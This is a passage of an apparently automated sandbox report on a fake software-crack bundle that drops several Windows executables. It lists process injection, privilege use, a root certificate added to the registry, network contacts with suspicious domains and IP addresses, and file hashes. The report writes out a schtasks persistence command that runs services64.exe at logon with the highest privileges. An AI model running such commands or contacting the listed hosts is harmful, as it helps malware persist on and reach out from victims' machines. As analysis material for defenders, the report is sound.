06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\services64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 800 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 800 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 800 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 800 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2456 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2456 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2456 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2456 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 800 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 800 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 800 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 800 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 2804 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2804 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2804 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2804 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2804 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2804 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2804 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2804 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 2804 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2804 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2804 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2804 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2804 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2804 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2804 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2804 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 800 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 800 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 800 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 800 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 2504 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2504 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2504 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2752 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2752 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2752 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2504 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2504 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2504 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 800 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 800 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 800 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 800 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 2032 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2032 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2032 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 2032 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
PID 800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 800 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 800 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 800 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 800 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp
RU 186.2.171.3:80 186.2.171.3 tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 186.2.171.3:443 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
UA 194.145.227.161:80 tcp
SG 37.0.10.244:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp

Files

\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2804-45-0x0000000000220000-0x00000000003F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/2992-70-0x00000000008F0000-0x0000000000910000-memory.dmp

memory/2152-69-0x0000000000D20000-0x0000000000D28000-memory.dmp

memory/2504-68-0x000000013FF70000-0x000000013FF80000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/2992-84-0x0000000000450000-0x000000000046A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/800-98-0x0000000003850000-0x0000000003AB7000-memory.dmp

memory/800-97-0x0000000003850000-0x0000000003AB7000-memory.dmp

memory/3008-100-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab58EB.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/3008-120-0x0000000000400000-0x0000000000667000-memory.dmp

memory/528-119-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/2504-125-0x0000000000A70000-0x0000000000A7E000-memory.dmp

memory/2056-132-0x000000013F320000-0x000000013F330000-memory.dmp

memory/3008-133-0x0000000000400000-0x0000000000667000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/2408-166-0x00000000008A0000-0x00000000008BE000-memory.dmp

memory/2408-167-0x0000000000240000-0x000000000025A000-memory.dmp

memory/2032-152-0x0000000000400000-0x0000000002B4E000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1480-191-0x000000013F8C0000-0x000000013F8C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar5ACE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa1ae69f33f753697474e8076e7477cb
SHA1 355bda4e65533627397e5dc3ae1a95260c2eb0be
SHA256 e7117af0feb90088913065fd4173a4424bae3faca9ab339094660192f14f46d7
SHA512 ceafdd223859eabe215f2d773ac0305265151a66d267514476d7cef07b6e0002e48c76360e40bb2339648bc2cb263fa24aa2e70bbaa87ba62dbeff7841049fbb

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20240903-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
